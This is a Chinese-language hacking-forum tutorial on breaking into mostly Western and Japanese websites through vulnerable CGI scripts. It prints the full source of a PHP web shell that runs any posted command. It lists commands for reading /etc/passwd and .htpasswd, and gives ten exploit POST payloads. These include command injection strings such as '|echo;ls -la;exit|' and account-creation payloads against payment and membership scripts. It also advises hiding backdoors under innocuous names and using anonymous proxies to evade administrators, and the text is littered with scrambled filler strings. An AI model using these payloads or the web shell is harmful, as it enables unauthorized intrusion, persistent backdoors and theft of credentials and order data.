CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
大家好 我是bboyhip  只是一名菜菜的exploiter
0 k* u; ?' [* W  J) V( N很开心来到贵论坛
这里让我感觉 很有技术交流的感觉
我会长长来玩的
2 s3 Y4 X9 a% K* N8 x' F前言:
  T* t/ K1 w/ _' D6 z1 Z以下讲解针对欧美日本网站
9 I2 `% T+ I9 A6 m: C' N- h當我們在做滲透分析的時候 方法有很多
0 ^" a% W/ g; I0 S8 L我门都知道 国外伺服器大多是linux 平台
所以有很多网站程序有6成都会使用cgi 脚本来管理
% }$ ^- E. z8 K8 l8 i目录为/cgi-bin/

* }5 q6 W2 o6 E( V0 j只是个人在实务上一些经验
9 R1 L# B9 K0 S: s$ F' A写的不好 请多多见谅喔
4 t! ]8 Q- |0 K5 Z在这里我简单分为几个部份一定要會的
讲解一下
# F8 t9 i$ |7 i$ X; Y. ~& n% U+ b让没有基础的人很容易上手
( @+ T; Q. [- Z1 m9 m$ \5 Y
以下内容跟帖回复才能看到
==============================

第1部份: 何谓Shell?
4 \7 s0 O) W; f6 y+ A  @Shell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
9 C, N  @( ^: \# l7 g" }* J意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.

对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
! }$ I! s7 h: B+ l所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.

第2部份: Unix 指令
% M4 {+ L( q# H$ H# q: G  R以下是一些常见及重要的指令:
pwd: 显示当前目录, 即是後门/程式所在的位置
如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
ls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
& e4 M5 \, ?+ _# G8 q: wls ../ -al: 详细列出上一层的资料夹及档案
cat: 显示档案内容
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
% X$ M2 T/ N! J( U5 C  Kwho: 显示谁login 至系统
man: 显示指令用法  
* w* O, v4 S) F% r! K+ |man ls: 显示ls这指令的用法  
: f; k/ K7 O6 l8 gmkdir 建立目录
. O* Z4 M. s4 L; t" a0 O8 Lrmdir 删除目录
- [5 w" `( @. Y+ h' Wmv 移动档案
6 I9 ~& q( n( t6 p: @rm 删除档案
3 G4 {- c4 `- L
第3部份: Shell的使用
例如:
$ v" e$ C3 m) jhttp://site.com/refer.php
这是我的後门, 原代码如下:
" o. u/ y; o" D2 ?7 i; L; G, b<Form Action="#" Method="POST">
<Input type="text" name="cmd">
<Input type="Submit">
* X: n; b' v. S+ A" D' h</Form>
<?php
8 {% t/ S( ]/ r( w( \9 Q+ X$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
6 m7 J6 @6 `% l* jecho $Output;
?>
/ M5 X+ H# j! M. X: @输入pwd, 可得到绝对路径:
/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
* J, J9 g8 `2 G$ e4 j
第4部份: 注意事项
- 使用匿名代理, 保障自己
# G/ K2 R: J  J8 S5 X5 L" p- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
3 ~2 T" M+ w) J9 O" r- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
不容易被发现.
- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
$ m, W1 C4 Y  O0 s. d% b这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
开始讲解脚本入侵过程:
' [8 H5 ]1 m0 D, w9 H. ^( ~在这里提供一些方法思路让大家学习一下
: R; m3 E7 o: |# k0 @2 l, ^
: ^, o; i$ f& v2 F& L( U1.一开始对一个网站进行cgi漏洞扫描
' e. g& r* i: {) M" {我们需要的东西有
扫洞工具 如:triton..等等
6 I- f/ D5 @0 N; B  b4 uE表
3 ~9 Z, z8 y4 R) U! Y9 y8 S0 o6 H如
/cgi-bin/add-passwd.cgi
7 c# M% e( Z. l0 c/WebShop/templates/cc.txt
; a  n0 z, T$ H+ Y0 |9 Y/Admin_files/order.log
/orders/mountain.cfg
. M  a/ N  A$ H+ d6 N8 J/cgi-sys/cart.pl
  K" Q4 h5 C' h+ [1 Z" ~4 ?, q/scripts/cart.pl
/htbin/cart.pl
E表来源可以是网路收寻或是自己的0 day

) I$ @) T: @2 g5 h2.怎样确认扫到的洞 是真的还假的?
/ g5 X; f! c7 @. c% O. f1 r举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
一般都是在IE里先看一下的,记住这个返回码哦
ERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
3.重来来了 很多人都会问我
他扫到很多洞 但是不会使用
( {2 b  o2 K' E2 l+ V" [因为这些漏洞 使用的语法 称为post
我们要找post 的方法很多
7 f% O0 K, V8 P9 o" U  I可以是源代码分析 找出介质
$ o: g$ c. M  M" y8 Y3 ?或是用抓包工具 抓他的语法...等等
; I  J# \1 i. w0 e# V% k
以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
" x1 w) ^; [4 x9 O7 x/index.cgi
3 p9 @( M6 T4 O& P9 Nwei=ren&gen=command
/passmaster.cgi
: Q' \& _8 K% O- e; U: nAction=Add&Username=Username&Password=Password
, K0 K0 f" H5 ^/accountcreate.cgi
4 \2 h  r& Y# M% [! Busername=username&password=password&ref1=|echo;ls|
/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
( W" ]; ~# e$ l. }# _9 V" F' u7 _/addusr.pl
- `3 W2 E0 }# @, a( X% `! W: n/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
/ccbill-local.asp
, W! a4 y- X$ ]5 bpost_values=username:password
/count.cgi
6 Y( @( v) {; O0 H" a  \pinfile=|echo;ls -la;exit|
/recon.cgi
/recon.cgi?search
! [, P3 G7 O* Dsearchoption=1&searchfor=|echo;ls -al;exit|
1 a! o! I! p: A8 [7 n/verotelrum.pl
' T& o) h& [/ }5 \vercode=username:password:dseegsow:add:amount<&30>
8 ?+ ?- u7 O& k, q" L$ G/af.cgi_browser_out=|echo;ls -la;exit;|

( |! q# l: Z7 _% U# b/ E# }今天就讲到这  感谢大家支持